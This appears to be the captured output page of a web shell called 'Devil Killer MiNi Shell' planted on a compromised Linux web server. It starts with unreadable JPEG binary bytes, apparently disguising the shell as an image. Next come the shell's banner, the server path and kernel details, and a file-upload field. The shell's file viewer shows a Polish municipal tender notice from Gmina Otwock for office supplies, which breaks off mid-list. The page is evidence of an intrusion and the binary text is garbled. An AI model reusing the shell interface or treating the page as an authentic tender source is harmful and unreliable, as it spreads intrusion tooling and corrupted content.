JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200610/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200610/550053-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 550053-N-2020 z dnia 2020-06-10 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Otwock</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa artykułów biurowych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Otwock</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">13268770000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Armii Krajowej</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">5</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">05-400</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Otwock</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">227 792 001</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">umotwock@otwock.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">227 794 225</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.otwock.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.otwock.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.otwock.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Zgodnie z art. 10c ust. 2 ustawy Prawo zamówień publicznych w związku z art. 18 ustawy z dnia 22 czerwca 2016 r. o zmianie ustawy - Prawo zamówień publicznych oraz niektórych innych ustaw (Dz. U z 2016 r. poz. 1020) składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529), osobiście lub za pośrednictwem posłańca.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Ofertę należy złożyć w siedzibie Zamawiającego- przy ul. Armii Krajowej 5 w Otwocku, kod 05-400, –budynek B, pok. nr 1,</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa artykułów biurowych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WZP.271.23.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia dostawa następujących artykułów biurowych: L.p.	Artykuły biurowe	Jednostka miary	Szacunkowa ilość 1.	1	Segregator A4/75 mm(standard wykonany z grubego kartonu, okleina z ekologicznej poliolefiny, z dwustronną etykietą, dolne krawędzie segregatora wzmocnione są niklowanymi okuciami, na grzbiecie znajduje się otwór na palec, różne kolory )	szt.	100 szt.2	Segregator A4/50 mm(standard wykonany z grubego kartonu, okleina z ekologicznej poliolefiny, z dwustronną etykietą, dolne krawędzie segregatora wzmocnione są niklowanymi okuciami, na grzbiecie znajduje się otwór na palec, różne kolory ) szt.	20 szt.3	Skoroszyt A4 plastikowy (twardy, z wąsem, przednia okładka przeźroczysta o grubości 200 µm, tylna okładka kolorowa o grubości 200 µm, dwustronnie zapisywalny biały pasek z otworami pozwalającymi na wpięcie do segregatora różne kolory )	szt.	500 szt.4	Skoroszyt tekturowy z przewleczką A4	szt.	500 szt.5	Teczka kartonowa A4 wiązana ( trzy wewnętrzne klapy zabezpieczające dokumenty przed wypadaniem, biała, z nadrukiem 2-3 linie, o gramaturze 275b/m2)	szt.	500 szt.6	Teczka kartonowa A4 z gumką ( wykonana z tektury o zwiększonej gramaturze i sztywności (450b/m2 ) jednostronnie barwiona, powlekana kolorowa folią polipropylenową, od wewnątrz jasna, gumka wzdłuż długiego boku) szt.	200 szt.7	Teczka do podpisu A4 ( 20 przegródek, okładki wykonane z twardego kartonu pokrytego folią polipropylenową dwa otwory do podglądu zawartości, wytrzymały harmonijkowy grzbiet) --różne kolory-	szt.	10 szt.8	Teczka z gumką A4 laminowana CROMA różne kolory	szt.	200 szt.9	Ofertówka A4 (sztywna, krystaliczna wykonana z PCV o grubości ,20 mm, zgrzana w literę L posiada wcięcie na palec umożliwiające łatwe otwarcie, prawy górny róg zaokrąglony)	szt.	20 op.10	Ofertówka A4 (sztywna, z kolorowym tyłem wykonana z PCV o grubości ,20 mm, zgrzana w literę L posiada wcięcie na palec umożliwiające łatwe otwarcie, prawy górny róg zaokrąglony)	szt.	20 op.11	Koszulki z folii A4 ( do segregatora, wykonane z folii polipropylenowej o grubości 50 mic., przeźroczyste, antyelektrostatyczne o wzmocnionym perforowanym brzegu, pakowane po 100 szt.)	opakowanie(100 sztuk )	300 op.12	Koszulki z folii A4 z klapka boczną( do segregatora, wykonane z folii polipropylenowej o grubości 100 mic., przeźroczyste, antyelektrostatyczne o wzmocnionym perforowanym brzegu, pakowane po 25 szt.)	opakowanie(25 sztuk )	10 op.13	Koszulki A4 szerokie( bardzo szeroka koszulka do segregatora, maksymalnie mieści do 100 kartek formatu A4, wykonana z polipropylenu o grubości 120 mic., przeźroczyste, antystatyczne wymiary 220 x 300, pakowane po 25 szt.)	opakowanie(25 sztuk )	10 op.14	Brulion A4 ( 96 kartek, o gr 60g/m2 z magrinesem, kratka, okładka twarda laminowana, szyty introligatorsko z marginesem i strona tytułową)	szt.	10 szt.15	Zeszyt A5 ( 96 kartek, o gr 60g/m2 z magrinesem, kratka, okładka twarda laminowana)	szt.	10 szt.16	Zeszyt A4 ( 200 kartek, o gr 60g/m2 z magrinesem, kratka, okładka twarda laminowana)	szt.	10 szt.17	Kołonotatnik A4 ( 100 kartek, okładka miękka, z indeksem) szt.	10 szt.18	Kołonotatnik A5 ( 100 kartek, okładka miękka, z indeksem) szt.	10 szt.19	Blok A4 do pisania (w kratkę, klejony na górze,100 kartek, o gr. 60g/m, mikroperforacja ułatwiająca odrywanie, dodatkowo wzmocniony grzbiet)	szt.	30 szt.20	Blok A5 do pisania (w kratkę, klejony na górze,100 kartek, o gr. 60g/m, mikroperforacja ułatwiająca odrywanie, dodatkowo wzmocniony grzbiet)	szt.	30 szt.21	Notatnik A6 (w kartkę, klejony na górze 100 kartek, o gr. 60g/m2)	szt.	30 szt.22	Dziennik korespondencyjny w twardej oprawie różne kolory	szt.	5 szt.23	Skorowidz ½ A4 kratka alfabetyczny w twardej oprawie	szt.	5 szt.24	Koperta DL (biała b/ok., samoklejąca)	szt.	3 op.25	Koperta C6 ( biała SK, b/ok., samoklejąca) pakowane po 1000 szt.	opakowanie(1000 sztuk )	20 op.26	Koperta C6 ( biała SK, z/ok. z prawej strony, samoklejąca) pakowane po 1000 szt.	opakowanie(1000 sztuk )	1 op.27	Koperta C5 ( biała SK, samoklejąca z paskiem) pakowane po 500 szt.	opakowanie(500 sztuk )	20 op.28	Koperta C5 ( biała SK, samoklejąca z paskiem) pakowane po 500 szt.	opakowanie(500 sztuk )	2 op.29	Koperta B4 ( biała SK, 225 x 325 mm samoklejąca z paskiem) pakowane po 50 szt.	opakowanie(50 sztuk )	20 op.30	Koperta E4 ( beżowa SK, 280 x 400 mm samoklejąca z paskiem, rozszerzone dno) pakowane po 50 szt.	opakowanie(50 sztuk )	20 op.31	Bloczek kostka klejona(wym. 85x85x40 mm, min. 400 arkuszy różne kolory, opakowaniejednostkowe w folii zabezpieczającej)	szt.	50 szt.32	Kostka samoprzylepna(450 kartek, wym. 76x76 mm, Posti- it , różne kolory, opakowanie jednostkowe w folii zabezpieczającej)	szt.	200 szt.33	Kostka samoprzylepna(100 kartek, wym. 38x51 mm, typu Posti-it , różne kolory,opakowanie jednostkowe w folii zabezpieczającej)	szt.	20 szt.34	Zakładki indeksujące MINI(foliowe, samoprzylepne o wymiarach 12 x 43 mm, po 35 szt., w komplecie 4 kolory różne)	opakowanie	200 op.35	Rolki kasowe (wym. 57x30 m, z białego papieru, o gramaturze 70g/m2, opakowanie zbiorcze zabezpieczone folią)	szt.	20 szt.36	Taśma samoprzylepna ( szer. 19 mm x 7,5 m przeźroczysta, z obcinaczem, nie żółknąca, opakowanie jednostkowe zabezpieczone folia lub kartonikiem.	szt.	200 szt.37	Taśma samoprzylepna ( szer. 19 mm x 7,5 m przeźroczysta , nie żółknąca, opakowanie jednostkowe zabezpieczone folia lub kartonikiem	szt.	200 szt.38	Taśma dwustronnie klejąca ( szer. 50mm x 5 m przeźroczysta, nie żółknąca, opakowanie jednostkowe zabezpieczone folia lub kartonikiem	szt.	10 szt.39	Ołówek HB z gumką ( odporny na złamania dzięki klejonemu na całej długości elastycznemu grafitowi do drewna cedrowego)	szt.	100 szt.40	Ołówek automatyczny (plastikowa obudowa z gumowym uchwytem, grubośc grafitów 0,5 mm) czarny grafit	szt.	20 szt.41	Grafity do ołówków automatycznych typu ( grubośc grafitów 0,5 mm)	opakowanie	20 op.42	Temperówka z jednym ostrzem metalowa w kształcie klina szt.	40 szt.43	Gumka do ścierania (wymiary 3,5 x 1,6 x1,2 cm)	szt.	40 szt,44	Klej w sztyfcie 9g ( nie zawierający rozpuszczalników, nie marszczący papieru, klejący silnie papier, fotografię i tekturę)	szt.	200 szt.45	Korektor w taśmie dł. taśmy 8,5 m szerokośc 4,2 mm ( nie widoczny na fotokopii, nie zawierający rozpuszczalnika) szt.	200 szt.46	Korektor w długopisie pojemnośc 10ml(szybkoschnący z metalowa końcówką)	szt.	10 szt.47	Korektor w płynie z pędzelkiem 20 ml( szybkoschnący na bazie rozpuszczalnika) szt.	5 szt.48	Linijka dł. 30 cm przeźroczysta	szt.	10 szt.49	Dziurkacz ( metalowy, duży, dziurkuje do 50 kartek, ergonomiczny kształt, obły, ogranicznik formatu, regulowana prowadnica min. 3 lata gwarancji)	szt.	20 szt.50	Dziurkacz ( metalowy, mały, dziurkuje do 20 kartek, ergonomiczny kształt, obły, ogranicznik formatu, regulowana prowadnica min. 3 lata gwarancji)	szt.	20 szt.51	Zszywacz ( duży,na zszywki 24/6, zszywający jednorazowo 30 kartek, magazynek na zszywki o zwiększonej pojemności, głebokośc zszywania kartek 63 mm, gumowa podkładka zapewniająca dobra przyczpnośc do powierzchni stołu, części mechaniczne z metalu, min. 5 lat gwarancji)	szt.	2 szt.52	Zszywacz ( mały, na zszywki NO10 , zszywający jednorazowo 10 kartek, pojemnośc magazynka 100 x 10, zintegrowany rozszywacz, części mechaniczne z metalu, głebokośc zszywania kartek 50 mm, min. 5 lat gwarancji)	szt.	10 szt.53	Zszywki do zszywaczy 24/6(opakowanie 1000 szt.)	opakowanie(1000 sztuk )	50 op.54	Zszywki do zszywaczy NO.10(opakowanie 1000 szt.)	opakowanie(1000 sztuk )	50 op.55	Rozszywacz ( uniwersalny do zszywek z mechanizmem blokującym ostrza)	szt.	20 szt.56	Spinacze 28 mm metalowe (pakowane po 100 szt.)	opakowanie(500 sztuk )	50 op.57	Spinacze 50 mm metalowe (pakowane po 50 szt.)	opakowanie(50 sztuk )	5 op.58	Klips metalowy do papieru 19 mm 12 sztuk w opakowaniu	opakowanie(12 sztuk )	30 op.59	Klips metalowy do papieru 32 mm 12 sztuk w opakowaniu	opakowanie(12 sztuk )	30 op.60	Klips metalowy do papieru 55 mm 12 sztuk w opakowaniu	opakowanie(12 sztuk )	30 op.61	Pinezki beczułki do tablic korkowych (w plastikowym pudełeczku) pakowane po100 szt.	opakowanie(100 sztuk )	5 op.62	Magnes małe o średnicy 2 cm w opakowaniu 10 szt. mix kolorów	opakowanie(10 sztuk )	5 op.63	Gumki recepturki duże ǿ 8 cm opakowanie	5 op.64	Gumki recepturki w małych opakowaniach	opakowanie	10 op.65	Nożyczki metalowe dł.15,5 cm (Laco , ergonomiczna rekojeśc z nielaminowanego plastiku, satynowe ostrze ze stali nierdzewnej)	szt.	20 szt.66	Flamastry ( Impega , napełniane tuszem na bazie wody, nietoksyczne, praktyczne i uniwersalne) w op. 6 kolorów	opakowanie(6 sztuk )	5 op.67	Zakreślacze fluorescencyjne ( grubośc linii 2,0-5,0 mm, nie rozmazujący wydrukowanego tekstu, pakowane po 6 kolorów)	opakowanie(6 sztuk )	50 op.68	Markery do płyt CD/DVD i folii ( różne kolory (wodoodporne), grubośc F=0,6 mm	szt.	10 op.69	Markery suchościeralne ( końcówka okrągła, grubośc linii 4,0 mm) pakowane po 4 szt.	opakowanie(4 sztuki )	10 op.70	Cienkopis (grubośc linii 0,4 mm podana na obudowie, końcówka oprawiona w metal, tuszu odporny na wysychanie) szt.	300 szt.71	Długopis na sprężynce(kolor tuszu niebieski.)	szt.	10 szt.72	Długopis żelowy niebieski ( z mechanizmem przyciskowym i wymiennym wkładem 0,7 mm, gumowy uchwyt, tusz pigmentowy)	szt.	200 szt.73	Wkłady niebieskie do długopisów żelowych szt.	200 szt.74	Długopis żelowy czarny ( z mechanizmem przyciskowym i wymiennym wkładem 0,7 mm, gumowy uchwyt, tusz pigmentowy ) szt.	200 szt.75	Wkłady czarne do długopisów żelowych szt.	200 szt.76	Długopisy z wkładem niebieskim wymiennym (metalowa końcówka, z mechanizmem przyciskowym) szt.	50 szt.77	Wkłady wymienne w kolorze niebieskim do długopisów ( typu Zenith )	szt.	50 szt.78	Długopisy z wkładem czarnym wymiennym(metalowa końcówka, z mechanizmem przyciskowym) szt.	50 szt.79	Wkłady wymienne w kolorze czarnym do długopisów ( typu Zenith )	szt.	50 szt.80	Długopisy z wymiennym wkładem niebieski (wykład 0,7 mm, gumowy uchwyt w kolorze wkładu)	szt.	50 szt.81	Wkłady do długopisu z wymiennym wkładem niebieskim (typu Pilot Super Grip )	szt.	50 szt.82	Długopisy z wymiennym wkładem czarnym (wykład 0,7 mm, gumowy uchwyt w kolorze wkładu)	szt.	50 szt.83	Wkłady do długopisu z wymiennym wkładem czarnym (typu Pilot Super Grip)	szt.	50 szt.84	Długopisy z wymiennym wkładem czerwonym (wykład 0,7 mm, gumowy uchwyt w kolorze wkładu)	szt.	50 szt.85	Wkłady do długopisu z wymiennym wkładem czerwonym (typu Pilot 